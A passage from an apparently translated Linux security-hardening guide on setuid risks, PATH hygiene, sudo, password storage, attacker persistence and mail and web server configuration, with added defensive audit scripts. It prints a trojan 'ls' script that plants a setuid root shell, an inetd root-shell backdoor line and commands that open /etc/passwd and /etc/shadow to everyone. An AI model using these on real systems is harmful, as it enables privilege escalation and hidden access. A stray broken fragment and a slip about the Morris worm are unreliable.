Upgrade to kernel 2.0.29 or later: these versions increase the capacity of the queue and shorten the timeout, which makes the queue harder to fill. In addition, a few entries under /proc shorten the SYN|ACK wait timeout and raise the maximum number of packets in the SYN queue:
/proc/sys/net/ipv4/vs/timeout_synack
/proc/sys/net/ipv4/vs/timeout_synrecv
/proc/sys/net/ipv4/tcp_max_syn_backlog
During an attack, raise tcp_max_syn_backlog and lower the timeout_* values. Changing these values can cause legitimate connections to be lost, but if no measures are taken against the SYN attack the system loses all connections.
Implement egress filtering
Many attacks rely on IP address spoofing, either to hide the source of the attack or to direct the response traffic at a host that never sent the request. Egress filtering is the most important way to prevent spoofing: a router connecting to another network should check all outgoing traffic and only pass a packet whose source address legitimately belongs to the local network. This seems obvious, but many networks do allow packets with any source address through.

Chapter VIII: Elevating user rights
A set-user-id program runs with the privileges of the file's owner rather than of the user who runs it.
A set-group-id program runs with the privileges of the file's group rather than of the caller.
The bad habit of including "." in the PATH
Including "." in the PATH saves the user a few keystrokes, running foo instead of sh foo or ./foo, but the practice is very dangerous. For example, create the following ls file in /tmp:
#!/bin/sh -
# fake trojan ls
if chmod 666 /etc/passwd > /dev/null 2>&1; then
    cp /bin/sh /tmp/.sh
    chmod 4755 /tmp/.sh
fi
exec ls "$@"
# end of script
If "." is in the PATH and comes before the directory that holds the real ls, then when a user in /tmp types ls on the command line, the script above runs instead of the real ls. Because the real ls is executed at the end, the user sees nothing unusual. If the user running the command is root, the script makes the password file writable, copies the shell to /tmp as .sh and sets its set-user-id bit, all of it silently. The PATH can be modified in several places at login, such as /etc/profile or the scripts under /etc/profile.d, so editing it by hand is tedious and error-prone. Instead, add the following line at the end of .bashrc or .profile:
PATH=`echo $PATH | sed -e 's/::/:/g; s/:\.:/:/g; s/^\.://; s/:\.$//; s/^://; s/:$//'`
It removes every form of "." from the PATH, including the empty entries (a leading, trailing or doubled colon) that mean the same thing.
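As an added example (not from the book), the following shell functions go one step further than the sed line: besides "." and empty entries they also flag relative entries and world-writable directories in the PATH, since either lets another user plant a fake ls in the search path.

```shell
#!/bin/sh
# Audit a PATH value for entries that let another user plant a trojan
# command. Added example, not from the book; uses only standard sh and find.

# check_path_entry ENTRY: print a finding for an unsafe entry, nothing otherwise.
check_path_entry() {
    entry="$1"
    case "$entry" in
        "")  echo "empty entry (searched as the current directory)" ;;
        .)   echo ". entry (current directory)" ;;
        /*)  # absolute: unsafe if anyone can write to it (a fake ls could be dropped there)
             if [ -d "$entry" ] && [ -n "$(find "$entry" -prune -perm -0002 2>/dev/null)" ]; then
                 echo "world-writable directory: $entry"
             fi ;;
        *)   echo "relative entry (resolved from the current directory): $entry" ;;
    esac
}

# audit_path PATHVALUE: one finding per line for every unsafe entry.
audit_path() {
    rest="$1:"                       # trailing ':' so the last entry is seen too
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"          # up to the first ':'
        rest="${rest#*:}"            # and the remainder
        check_path_entry "$entry"
    done
}

# clean_path PATHVALUE: print the PATH with every unsafe entry removed,
# the stricter equivalent of the sed one-liner in the text.
clean_path() {
    rest="$1:"
    new=""
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"
        rest="${rest#*:}"
        if [ -z "$(check_path_entry "$entry")" ]; then
            new="${new:+$new:}$entry"
        fi
    done
    printf '%s\n' "$new"
}

# Typical use at the end of .profile:
#   audit_path "$PATH" >&2
#   PATH=$(clean_path "$PATH"); export PATH
```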
Plaintext passwords
Remove the user's password from files such as the fetchmail control file. If you must keep it there, make sure the file can be read only by its owner and not by group members or anyone else.
Passwords stored in the file system
Some systems require passwords to be stored in the file system, for example smbprint in the samba package, a tool that lets Linux use a printer attached to a Windows machine. For dial-up users, the user name and password needed for the link are usually stored in a file: in general ppp looks for the password in /etc/ppp/chap-secrets, and wvdial in /etc/wvdial.conf. Use chmod 600 filename to restrict such a file so that only root can read it.
A user name and password control access to the printer. To keep the smbprint password protected, make sure that not every user can read the .config file under /var/spool/lp: look at all the .config files in the /var/spool/lp directory and run chmod o-rw on each of them.
Reversible passwords
pop3 normally transmits the user name and password for authentication over the Internet in plain text. That is not good, and one alternative is the authentication method called popauth. But popauth stores all passwords in a database after a reversible encryption, so if an attacker can access that database, every user and password on the system is threatened. If possible, do not use popauth; many pop3 clients support SSL encryption, so use SSL to protect user authentication. If you must use popauth, make sure /etc/popauth can be read only by root.
Passwords on the command line
Some utilities, such as smbmount and smbclient, allow a password to be passed on the command line or in an environment variable. Such a password can be obtained with the ps command or by reading files under /proc directly. All commands typed are also saved in the shell history file .bash_history. Avoid entering passwords on the command line in any case, and periodically remove the history file so that commands and security-sensitive information do not accumulate. If you do not want certain commands to be recorded, unset the HISTFILE environment variable to turn off the history function and then open a new shell.
Group write permission
If one member of a primary group is compromised, the security threat to the other members of the group increases. Each user should have a unique primary group of which he is the only member; then every file a user creates belongs only to that primary group, unless group ownership is changed to solve a shared-file access problem through a secondary group. The user's umask should be set to a strict, safe value so that a newly created file is not readable and writable by default: with umask 066, a file is readable and writable only by its owner after creation, and group members and others can neither read nor write it. In extreme cases use umask 077. The default umask should make files accessible only to their owner or to root.
Special-purpose groups and device access
Attackers typically look for devices in /dev whose permissions are set improperly and use them to access memory, disks or serial ports, and on that basis intrude further into the system and its sensitive files. For example, through /dev/kmem an attacker can read the kernel memory area and from it any data the system is currently using. If a disk partition (such as /dev/hda1) is readable, the attacker can read the raw disk data; with /sbin/dump she can directly obtain a copy of every file on the partition. Such methods bypass all file permissions, and every file, including /etc/shadow, can be read without root privileges. If users need access to special device files that only root can access, consider using sudo.
The wheel group
wheel is a special group on the system. When the wheel group is enabled, only its members can su to root, so even if the root password is compromised, a user who is not a member of wheel cannot run su to become root. Combined with restricting remote root login through /etc/securetty, this enhances system security and protects the most important account, root. The drawback is that it gives an attacker a clue about which accounts are more valuable and have more permissions. Although the wheel group is predefined, most Linux systems do not automatically enable wheel-group access control. On systems that support PAM, adding a pam_wheel line to the appropriate PAM control file (/etc/pam.d/su) enables wheel-group support.
sudo is a common tool that lets administrators share some of their authority. With sudo you can allow certain users to perform specific administrative tasks that normally only root can run; for example, you can authorize a user to add, delete or modify users, or their passwords.
Changing passwords through sudo: generally the system administrator authorizes ordinary users to run the passwd command, but when they run it they can change any password, including root's, which is obviously a problem. A front-end script should therefore check the user name whose password is to be changed and confirm that the modification is legitimate. In general, system accounts have user id numbers below a preset value (usually 200 or 500); if the id of the account being modified is below that minimum, the script should produce an error. Depending on system policy, the script should also check that the user is not locked and has a legal login shell.
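The front-end script described above, as an added example that is not from the book: it applies the three checks (minimum uid, account not locked, valid login shell) and only then runs passwd. The file locations are parameters so the checks can be exercised against copies of the files; MIN_UID is the assumed boundary for system accounts.

```shell
#!/bin/sh
# Front end for a sudo-granted passwd command. Added example, not from the
# book: it refuses to change the password of a system account (uid below
# MIN_UID), a locked account or an account without a valid login shell,
# and only then runs passwd for the named user.
MIN_UID=500          # system accounts live below this (500 or 200 depending on the system)

# check_target USER PASSWD_FILE SHADOW_FILE SHELLS_FILE MIN_UID
# Prints the reason and returns 1 when USER's password must not be changed.
check_target() {
    user="$1" passwd_file="$2" shadow_file="$3" shells_file="$4" minuid="$5"
    # Reject names that are empty, option-like, or contain anything outside a
    # safe character set, so the name can never be misinterpreted by the shell or passwd.
    case "$user" in
        ""|-*|*[!A-Za-z0-9._-]*) echo "invalid user name"; return 1 ;;
    esac
    # Exact match on the first field; grep "^user:" would treat '.' as a wildcard.
    line=$(awk -F: -v u="$user" '$1 == u { print; exit }' "$passwd_file")
    if [ -z "$line" ]; then
        echo "no such user: $user"; return 1
    fi
    uid=$(printf '%s\n' "$line" | cut -d: -f3)
    shell=$(printf '%s\n' "$line" | cut -d: -f7)
    if [ "$uid" -lt "$minuid" ]; then
        echo "refusing system account $user (uid $uid < $minuid)"; return 1
    fi
    if ! grep -qxF "$shell" "$shells_file"; then
        echo "$user has no valid login shell ($shell)"; return 1
    fi
    # A password field starting with '!' or '*' marks a locked account.
    pwhash=$(awk -F: -v u="$user" '$1 == u { print $2; exit }' "$shadow_file")
    case "$pwhash" in
        '!'*|'*'*) echo "account $user is locked"; return 1 ;;
    esac
    return 0
}

main() {
    [ $# -eq 1 ] || { echo "usage: $0 user" >&2; exit 2; }
    if ! msg=$(check_target "$1" /etc/passwd /etc/shadow /etc/shells "$MIN_UID"); then
        echo "$msg" >&2; exit 1
    fi
    # Absolute path, so a trojan passwd earlier in PATH cannot be picked up.
    exec /usr/bin/passwd "$1"
}

if [ $# -gt 0 ]; then
    main "$@"
fi
```

Install it as the only passwd-related command in sudoers, so users never get the real passwd binary through sudo.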
sudo and editor operations
Typically a user granted the right to run a configuration program may run an editor, for example through crontab -e -u user. Most such programs let the caller choose the editor through the VISUAL or EDITOR environment variable, so the caller can in effect run almost any program. The editor should be limited to a well-known set such as vi, ed or emacs. But even those editors can execute a shell or external commands, and because the editor runs as root, any program started from the editor gets a shell with root privileges. The best solution is for the program to lock the file being edited and copy it to a safe location where an ordinary user with minimal permissions edits it. The user then edits the temporary copy and cannot compromise the protected system file. After editing is complete, the program checks that nothing in the restricted area has changed and that the changes are consistent with the file structure and system requirements, then copies the modified file back over the original and unlocks it.
Other programs that create sudo vulnerabilities
chmod: lets developers set a directory writable so they can complete their work. An attacker can run chmod 666 /etc/passwd /etc/shadow and then freely create or modify accounts.
chown: lets a developer in a shared area (such as a web document tree) take control of other developers' files. The effect of the attack is the same as with chmod.
tar/cpio: lets users create archives and backups. An attacker can use them to extract files that replace executables or configuration files on the file system.
mount: lets a user mount a remote file system. An attacker can use it to mount a file system containing set-user-id programs and use them to gain system privileges.
useradd: lets a trusted user create new accounts. An attacker can use it to create a new root-level account.
rpm: installs rpm packages. An attacker can use it to downgrade system software to versions with exploitable vulnerabilities, or to install rpm packages through which the attacker gains root privileges.
When creating the sudoers file, specify in detail the programs that may be run and their parameters. The following example configures two groups: users in the HTTPD_RESTRICTED group can run the apachectl program only with the start and stop options, while members of the HTTPD_FULL group can run it with every option it supports (alias names in sudoers must be written in upper case).
User_Alias HTTPD_FULL = king, ryan, chris
User_Alias HTTPD_RESTRICTED = guest, tax
Cmnd_Alias APACHECTL = /etc/apachectl *
Cmnd_Alias WEB_RESTART = /etc/apachectl start, /etc/apachectl stop
HTTPD_FULL ALL = (ALL) APACHECTL
HTTPD_RESTRICTED ALL = (ALL) WEB_RESTART
Listing the parameters explicitly prevents users from running a program freely and avoids improper use. Front-end scripts that validate parameters must be written with care: the script should check PATH, the library path, EDITOR and other sensitive environment variables, and must invoke programs by absolute path to avoid Trojan horse attacks.
Format string attacks
Programmers now like to use printf(), syslog() and other functions that support formatted output to print a simple string. The correct way is printf("%s", str); however, to save time and six keystrokes, many programmers omit the first argument and write printf(str).
General prevention of set-user-id problems
Use chattr +i to make every set-user-id program immutable, and make all system programs and directories immutable as well. The files in /bin, /usr/bin, /sbin, /usr/sbin, /lib and so on change rarely, so when they do change the administrator must know about it. If possible, use separate partitions for /, /boot, /usr, /var and /home, mount the system directories read-only, and use a security-enhancement tool such as the Linux Intrusion Detection System (LIDS) to prevent an intruder from remounting the read-only partitions in read-write mode. Delete or disable useless set-user-id programs.
Set-user-id programs on file systems mounted by an attacker
Users mount drives, devices, files and remote file systems with mount; when a mounted file system, for example an NFS file system, contains set-user-id programs, this can cause problems. To prevent set-user-id execution on mounted file systems, any remote or local file system should be mounted with the nosuid flag. You can also set the noexec flag on untrusted file systems so that no program on them can run; if one of the programs is needed, copy it to a local file system and run it from there. This not only helps prevent privilege-escalation attacks and deals with set-user-id perl scripts, but also reduces the breeding ground for worm programs that spread through the network.
Hard and symbolic links: any temporary file a program uses must be created in a way that fails if the file already exists. For the open() system call, use the O_EXCL flag:
open("/tmp/filename", O_EXCL | O_CREAT | O_RDWR, 0666);
In perl, sysopen achieves the same:
sysopen(HANDLE, "/tmp/filename", O_EXCL | O_CREAT | O_RDWR);
In shell scripts, use the mktemp utility:
tmpfile=`mktemp /tmp/filename.XXXXXX` || exit 1
command > $tmpfile
If a higher level of security is needed, install the Linux kernel patch developed by Solar Designer, found at http://www.openwall.org; it prevents attacks through symbolic and hard links to files in the /tmp directory, because a user can create a link in /tmp only if the user actually owns the target file or has read and write access to it. Follow good partitioning habits, such as separate partitions for /home, /var, /tmp, /usr, /boot and /, and make sure ordinary users have no write permission on any partition other than /home and /tmp. This prevents hard links to system files such as /etc/passwd and /bin/ls from being created.
Input validation
A script should always validate its input parameters to ensure they contain no illegal characters or shell metacharacters. Parameters that could be interpreted in unexpected ways must not contain whitespace, shell metacharacters or control characters. This rule applies to shell scripts and also to C programs that unwisely use the system() function. A script should also guard against modification of IFS: before using the incoming parameters, check that IFS is correct or set it to a safe value.
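The two checks just described, as an added example that is not from the book: an allow-list for parameters (stricter than rejecting the listed characters one by one) and a prologue that resets IFS and PATH. The allowed character set is an assumption chosen for a script that takes file names and user names.

```shell
#!/bin/sh
# Parameter validation for a shell script that runs with privileges (for
# example through sudo). Added example, not from the book.

# Restore IFS to the standard value (space, tab, newline) before any unquoted
# expansion, since a caller who sets IFS can change how arguments are split.
sanitize_environment() {
    IFS=$(printf ' \t\nx'); IFS=${IFS%x}   # the 'x' keeps $(...) from stripping the newline
    PATH=/bin:/usr/bin                      # fixed search path: no trojan lookups
    export IFS PATH
    unset ENV BASH_ENV CDPATH               # files and paths sh would read or search implicitly
}

# validate_arg ARG: return 0 only if ARG is safe to pass on to other commands.
# Allowed: letters, digits, '_', '.', '-', '/', '@' and '+'. Everything else,
# including whitespace, control characters and shell metacharacters, is rejected,
# as are option-like values and '..' path components.
validate_arg() {
    case "$1" in
        "")                     return 1 ;;   # empty
        *[!A-Za-z0-9_./@+-]*)   return 1 ;;   # outside the allow-list
        -*)                     return 1 ;;   # would be parsed as an option
        ..|../*|*/..|*/../*)    return 1 ;;   # directory traversal
    esac
    return 0
}

# reject_reason ARG: human-readable explanation of why validate_arg fails.
reject_reason() {
    case "$1" in
        "")                     echo "empty argument" ;;
        *[!A-Za-z0-9_./@+-]*)   echo "illegal character in argument" ;;
        -*)                     echo "argument looks like an option" ;;
        ..|../*|*/..|*/../*)    echo "directory traversal in argument" ;;
        *)                      echo "ok" ;;
    esac
}

# Typical prologue of a privileged script:
#   sanitize_environment
#   for arg in "$@"; do
#       validate_arg "$arg" || { echo "$0: $(reject_reason "$arg")" >&2; exit 1; }
#   done
```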
Chapter IX: Password cracking
DES (Data Encryption Standard): on Linux, crypt(3) implements the DES function. It takes two parameters, the key and the salt; the key is the user's password and the salt is a string of length 2 chosen from [a-zA-Z0-9./]. The user's password cannot be longer than 8 characters. DES was developed partly with the support of the US government and could not be exported outside the United States.
MD5 is a hashing algorithm that improves on DES in many ways: the password length is unlimited, the key space is larger and the output is longer than DES's 13 characters, and it can be exported outside the United States.
Password cracking programs
crack, john the ripper, viper, slurpie
1. Run a password cracking program yourself to find weak passwords on the machine.
2. Make sure the password file is not readable.
3. Always check the log files.
4. Use shadow passwords.
Shadow passwords
/etc/shadow is readable only by root. Its format is as follows:
1. the user name;
2. the password ciphertext;
3. the date of the last password change, as the number of days since 1 January 1970;
4. the number of days that must pass before the user may change the password again;
5. the number of days after which the user must change the password;
6. the number of days before the password must be changed on which the system starts warning the user;
7. the number of days after expiry during which the user may still change the password; after that the account is disabled;
8. a reserved field.
Enabling shadow passwords
pwck: checks the integrity of /etc/passwd.
pwconv: converts to shadow passwords. It creates the /etc/shadow file from the existing /etc/passwd, merging with /etc/shadow if that file already exists. Even after a successful conversion, a normal unshadowed account may still be added to /etc/passwd later, so the contents of /etc/passwd need to be checked periodically to ensure all passwords are shadowed.
pwunconv: removes the shadow file.
The chage command determines whether and when the user must change the password. Use the -M option to force the user to change the password after a specified period of time.
mindays: the minimum number of days between two password changes.
maxdays: the maximum number of days a password remains valid.
lastday: the date of the last password change, as days since 1 January 1970.
inactive: the number of days after the password expires before the account is disabled.
expiredate: the date on which the account is disabled.
warndays: the number of days before the password must be changed on which the user is reminded.
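An added example, not from the book, that reads the field layout described above back from a shadow file and reports what an administrator would want to know: empty password fields, passwords that never expire or have already expired, DES hashes still to be converted to MD5, and expired accounts. It takes today's date in days since 1970, the unit the file uses; in a real shadow file the eighth field is the account expiry date in that unit and the ninth is the reserved field.

```shell
#!/bin/sh
# Audit a shadow file using the field layout described above. Added example,
# not from the book. Run as root (or on a copy), since /etc/shadow is readable
# only by root. Dates are days since 1 January 1970, like fields 3 and 8.

# days_since_epoch: today's date in the unit /etc/shadow uses.
days_since_epoch() {
    echo $(( $(date +%s) / 86400 ))
}

# audit_shadow SHADOW_FILE TODAY: one finding per line.
audit_shadow() {
    awk -F: -v today="$2" '
    NF < 8 { next }                     # malformed line, not a shadow entry
    {
        name = $1; pwhash = $2; last = $3; maxdays = $5; expire = $8
        if (pwhash == "")
            print name ": EMPTY password field, login without a password"
        else if (pwhash ~ /^[!*]/) {
            # locked account: nothing to report
        }
        else {
            if (maxdays == "" || maxdays + 0 >= 99999)
                print name ": password never expires"
            else if (last + maxdays < today)
                print name ": password expired " (today - last - maxdays) " days ago"
            # DES crypt(3) output is 13 characters with no "$id$" prefix;
            # MD5 hashes start with "$1$" and are longer.
            if (pwhash !~ /^\$/ && length(pwhash) == 13)
                print name ": DES hash (8-character limit), convert to MD5"
        }
        if (expire != "" && expire + 0 < today)
            print name ": account expired"
    }' "$1"
}

# Typical use:  audit_shadow /etc/shadow "$(days_since_epoch)"
```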
Other utilities
gpasswd: add a user to a group.
groupadd: create a new group.
groupdel: delete a group.
groupmod: modify group information.
passwd: set a password.
useradd: create a new user.
userdel: delete a user.
usermod: modify user information.
Password protection
Create a strong password by planning it, with at least one character from each of these character sets: a-z, A-Z, 0-9 and punctuation. With DES use 6 to 8 characters; with MD5 use any length, and longer than 15 is better. Use different passwords on different systems; that makes them hard to remember, and one solution is to keep them in a file protected with PGP and a strong passphrase.
The passwd+ program can force users to use strong passwords.
npasswd and anlpasswd are excellent password checkers.
Use one-time passwords (OTP): SecurID, S/Key, OPIE.
Summary of password protection methods:
1. Implement shadow passwords.
2. Use MD5 instead of DES.
3. Implement a good password policy, including testing new passwords when a user creates them, to force users to use strong passwords.
4. Periodically run password cracking programs to find weak passwords on the system.
5. Consider using password expiry dates and one-time passwords.
6. Never tell anyone your password.
Chapter X: Ways hackers keep their access
Host-based authentication and user access
Modifying hosts.allow and hosts.deny
Many network services use the /etc/hosts.allow file to determine which clients are allowed to connect. If the service does not accept connections from a host, it closes the connection immediately after the TCP handshake completes, without sending or receiving any data; the service is therefore immune to attacks from that host over such a connection, because the hacker never gets a chance to send data that could do damage. The /etc/hosts.deny file should normally contain "ALL: ALL", meaning that every host not listed in hosts.allow is rejected. Simply deleting that line (for example with cat /dev/null > /etc/hosts.deny) lets hackers connect to the services provided.
Use a file integrity tool to monitor these two files, and consider making them immutable with chattr +i.
Insecure nfs exports
Exporting "/" itself lets a hacker modify every file on the target host without even logging in.
Remote shell commands: comment out the following lines in /etc/inetd.conf:
shell stream tcp nowait root /usr/sbin/tcpd in.rshd
login stream tcp nowait root /usr/sbin/tcpd in.rlogind
exec stream tcp nowait root /usr/sbin/tcpd in.rexecd
After installing ssh, a file integrity tool should be used to monitor all of the following files:
/etc/sshd_config
/etc/ssh_known_hosts
Adding a root shell to inetd
A simple way to create a network-accessible root shell is to add a record to the /etc/inetd.conf file. Assuming the compromised system does not use the ingreslock port, the hacker can add the following line to /etc/inetd.conf:
ingreslock stream tcp nowait root /bin/bash -i
Given the -i parameter, /bin/bash creates an interactive shell, so as soon as the hacker connects to the system's ingreslock port, commands can be executed directly. Because this is not a real tty (the connection is a network socket) it is not as convenient as the console, but any command can still be run.
Run a file integrity checker. Configure the firewall to allow connections only to the required ports (ssh, smtp and http). Use chattr +i. An even better approach is not to run inetd at all: most of the services inetd provides are not necessary.
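An added example, not from the book, of the checks the last paragraph calls for: the first function scans an inetd.conf for the kinds of entry discussed in this chapter (a shell served as a network service like the ingreslock line, the r-services that ssh should replace, and root services not wrapped by tcpd); the second does what a file integrity tool would, reporting lines added since a known-good copy.

```shell
#!/bin/sh
# inetd.conf audit. Added example, not from the book.
# inetd.conf fields: service socket protocol wait/nowait user server [args...]

# audit_inetd_conf FILE: one finding per suspicious entry.
audit_inetd_conf() {
    awk '
    /^[ \t]*#/ || NF < 6 { next }               # comments, blanks, truncated lines
    {
        user = $5; server = $6
        if (server ~ /\/tcpd$/) server = $7     # tcpd wrapper: the real daemon follows
        prog = server; sub(/.*\//, "", prog)    # basename of the program
        if (prog ~ /^(sh|bash|csh|tcsh|ksh|zsh|perl)$/)
            printf "BACKDOOR? %s on service %s runs as %s: %s\n", prog, $1, user, $0
        else if (prog ~ /^in\.(rshd|rlogind|rexecd)$/)
            printf "R-SERVICE %s enabled, replace with ssh: %s\n", prog, $0
        else if (user == "root" && $6 !~ /\/tcpd$/)
            printf "UNWRAPPED root service %s (no tcpd): %s\n", $1, $0
    }' "$1"
}

# diff_inetd_conf BASELINE CURRENT: print non-comment lines present in CURRENT
# but not in the known-good BASELINE copy (what a file integrity tool flags).
diff_inetd_conf() {
    grep -vxF -f "$1" "$2" | grep -v '^[[:space:]]*#' || true
}

# Typical use:
#   audit_inetd_conf /etc/inetd.conf
#   diff_inetd_conf /var/backups/inetd.conf.known-good /etc/inetd.conf
```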
Trojan programs: after gaining control of a host, hackers modify and recompile commonly used programs such as ls, netstat and so on in order to keep control and hide their presence.
lrk (linux root kit) provides a large number of Trojan programs such as du, find, ls, ifconfig and the like.
RKdet and chkrootkit are two tools that detect lrk.
Kernel intrusion
Loadable kernel modules: use integrity checks to find newly installed or modified modules in the /lib/modules tree, and apply permission restrictions and the chattr +i command. A properly configured kernel patch such as LIDS makes it impossible even for root to install files in /lib/modules or to load kernel modules.
If the kernel itself is compromised, there is big trouble: while the compromised kernel is running, the administrator cannot trust any information about the system, including file and process lists, network connections, disk and CPU statistics, and /proc. The system recovery process described in chapter two must begin immediately.

Chapter XI: Server security
Mail security
Mail User Agent (MUA), such as Mutt, Pine, Elm: users use these programs to edit and read messages.
Mail Transfer Agent (MTA), such as sendmail, qmail, postfix: its main function is forwarding messages between machines.
Mail Delivery Agent (MDA): the intermediary between the user interface and the MTA; it takes mail from the MTA and places it in the local inbox, or passes outgoing messages to the MTA. Programs of this kind include mail.local and procmail.
The vast majority of security issues involve the MTA.
sendmail runs on about 75% of the mail servers on the Internet.
In 1988 the Morris worm exploited its WIZ command on the Internet; any user could use it to obtain root privileges. Recently, however, sendmail has become quite stable, which can largely be attributed to the founding of Sendmail Inc., the commercial organization now in charge of sendmail development.
To keep e-mail secure it is absolutely vital to subscribe to the security mailing list of the chosen mail server and to be ready to upgrade when necessary.
The biggest problem is that the mail server must bind to port 25 and so must be started as root; as soon as a hole is found in the server, a hacker may gain root privileges immediately. Postfix and qmail do not run as root: each uses a single separate process bound to port 25 that immediately hands established connections to an independent smtp program that never runs as root, so neither program has this class of root vulnerability. sendmail provides the RunAsUser option in sendmail.cf; when it is set, the sendmail daemon becomes the designated user before reading and delivering mail. This also means the files it uses must be made readable by that user, including the queue entries in /var/spool/mqueue, the alias list and :include: files. Since there is no default user and group, they must be created. For sendmail to run as user sendmail and group mail, for example, the .cf file must contain the following line:
O RunAsUser=sendmail:mail
The mail server banner
After a connection is established, the smtp server immediately sends a banner to the client. The banner usually includes the mail server name, the smtp software name and version and the current time, which is very useful information for hackers, so this welcome message should be hidden. In the sendmail.cf file, locate SmtpGreetingMessage, which looks like:
O SmtpGreetingMessage=$j Sendmail $v/$Z; $b
Change it to O SmtpGreetingMessage=$j BWare -SMTP spoken here; $b
Then reload the configuration with: killall -HUP sendmail
For qmail, modify the smtpgreeting value of qmail-smtpd; for postfix, modify the smtpd_banner value.
The SMTP VRFY command
VRFY was originally intended to help determine whether a user name or e-mail address is legitimate, but the command is now rarely used for that purpose. On the contrary, it is often used by hackers to brute-force user names.
Usage: VRFY xxxx. The logs can record VRFY command activity.
To turn the command off, change PrivacyOptions in sendmail.cf as follows:
O PrivacyOptions=authwarnings,novrfy
or add the following line to the sendmail.mc configuration file, then regenerate sendmail.cf and reload the configuration:
define(`confPRIVACY_FLAGS', `authwarnings,novrfy')dnl
The SMTP EXPN command
EXPN expands a user name or e-mail address. Like VRFY, it can be used to guess user names and e-mail addresses.
To turn off EXPN requests, amend the PrivacyOptions flag in sendmail.cf as follows:
O PrivacyOptions=authwarnings,noexpn
or add the following line to the sendmail.mc configuration file, then regenerate sendmail.cf and reload the configuration:
define(`confPRIVACY_FLAGS', `authwarnings,noexpn')dnl
To turn off both VRFY and EXPN at once, write authwarnings,noexpn,novrfy. If you are using a recent version you can also use the goaway option, which automatically includes noexpn, novrfy and other PrivacyOptions.
qmail and postfix do not support the EXPN command, so they have no such problem.
Inappropriate file permissions
While receiving and delivering mail, the mail server may use multiple files, such as the virtual host table, mail aliases and the mail routing map. If a user is able to modify these files, the operation of the mail server can be affected. Therefore set appropriate permissions on these files and use a file integrity tool to closely monitor all the files the mail server uses. To be sure, you can also use chattr +i to make these files immutable.
sendmail 8.9 and later check the permissions on .forward files, :include: files, address maps and other related files before using them; if it considers the permissions looser than required, it sends back a message and cancels the operation. If you really want to rely on the permissive permissions, you must add the following line to sendmail.mc to tell sendmail that the unsafe permissions are intended:
define(`confDONT_BLAME_SENDMAIL', `groupwritablealiasfile')dnl
Warning: if you break sendmail's strict permission rules, be sure you understand what that means, because once users are allowed to modify sendmail-related files they may obtain root privileges.
To further prevent the running of external commands, sendmail can be configured to use smrsh (the sendmail restricted shell) for all shell commands by adding the following line to sendmail.mc:
FEATURE(`smrsh', `path-to-smrsh')
smrsh only executes programs in a specific directory (by default /usr/adm/sm.bin), but the safety of the programs in that directory must be ensured.
qmail and postfix follow one principle: only root has write permission on files related to the mail server. The only exception is the .forward file, which, once enabled, must be owned by the receiving user. The mail server's files live in /etc/postfix and /var/qmail; make sure these files are writable only by root.
Mail relaying
To keep your machines and network from being abused by spam vendors, you must make sure they do not relay messages from unauthorized domains.
sendmail 8.9 and later reject mail relaying by default; if you must relay messages from certain hosts, add their addresses to the /etc/mail/access file.
WARNING: sendmail treats everything after the hostname in the fully qualified name as the domain name. If the administrator uses FEATURE(`relay_entire_domain') in the .mc file and any of the local IP addresses reverse-resolves to a second-level domain (such as example.com), the intent is to allow relaying for all machines in the domain, but unfortunately sendmail treats the domain as .com and the server actually runs as an open relay.
qmail 0.91 and later also reject mail relaying by default. To let specific hosts relay messages through the server, there are two ways:
1. Install tcp wrappers with host_options support and run the qmail-smtpd daemon as shown below:
tcpd /var/qmail/bin/tcp-env /var/qmail/bin/qmail-smtpd
and add a line like the following to /etc/hosts.allow for every host that needs to relay:
tcp-env: xxx.xxx.xxx.xxx: setenv = RELAYCLIENT
2. If you use tcpserver 0.80 or later, add the following line to /etc/tcp.smtp:
xxx.xxx.xxx.xxx:allow,RELAYCLIENT=""
Then run: tcprules /etc/tcp.smtp.cdb /etc/tcp.smtp.tmp < /etc/tcp.smtp
`print decode_base64" listening to the password string ''
To reduce the chance of a hacker sniffing user names and passwords, use secure http connections with SSL. The following example uses stunnel to connect to an SSL site listening on port 443: an encrypted connection is established first, and data sent afterwards is sent encrypted.
machine$ stunnel -f -D7 -c -r www.example.com:443
The US patent on the algorithms required by SSL version 2 expired on September 20, 2000, so the RSAREF library can now be replaced (which also improves security and stability).
TLS (Transport Layer Security) is a protocol based on SSL v3.0 proposed by the Internet Engineering Task Force (IETF) in 1998. Its main purpose is the same as SSL's: to provide a secure transport layer. Its goals are cryptographic security, interoperability, extensibility and relative efficiency. Compared with SSL it slightly enhances security, defines the specification more clearly, and provides a broader basis for future protocols.
Allowing .. (double dot) in URLs
Early Apache had a huge security hole: .. in a URL was allowed to point to the parent directory. Apache fixed this loophole very early on, but the problem still affects CGI programs.
Apache should not be run as root. Otherwise the server can read files belonging to root, and the CGI programs it executes run with root privileges as well.
Dangerous symbolic links
If you allow the server to follow symbolic links there is a potential security threat. Restricting the web server's access to the files within the document tree is the most important file security policy. If a symbolic link exists, for example a user places in his html directory a link named link_to_etc that points to /etc, an attacker can request the /etc/passwd file as:
http://localhost/~hack/link_to_etc/passwd
Symbolic links are allowed with:
Options FollowSymLinks
A stricter configuration allows a symbolic link to be followed only when the link and the file or directory it points to belong to the same user:
Options SymLinksIfOwnerMatch
If you need links, keep them in one central directory that only authorized users (writing as root) can modify, and refuse ordinary users the right to create symbolic links there, which limits how much sensitive information can be linked to. Give that directory the permissions rwxr-xr-x, and use a Directory section so that Apache follows symbolic links only within that directory:
Options FollowSymLinks
Preventing directory listings
The Apache directive Options Indexes makes the server return a listing of a directory's contents. Remove Indexes from all Options directives to prevent directory listings.
Restricting CGI to specific directories. Allowing CGI to run in any directory is a potential security issue, so Apache is usually configured so that CGI programs can only be executed in CGI directories, normally named cgi-bin or bin. All files in these directories are treated as executable and run with the identity of the web user (usually nobody). Watch the contents of these directories closely, because they are executed whenever they are requested.
ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin"
Do not enable CGI based on file name. The server can run CGI based on a specific extension (.cgi, .pl, .php); this lets programs be placed anywhere in the server's directory tree rather than in a specific directory, which creates potential safety problems. The configuration directive that starts CGI based on file name is AddHandler cgi-script .cgi; do not use it. Note that some installations enable this function by default: check the system configuration and comment out or delete the option.
Do not keep multiple versions of a program under the CGI directory.
To restrict access to files by file name, use the Files or FilesMatch directive. With Files, use the "~" sign to indicate that the quoted string is a regular expression. The following example denies access to all files ending in .bak:
<Files ~ "\.bak$">
Order allow,deny
Deny from all
</Files>
With FilesMatch, the string is treated as a regular expression directly.
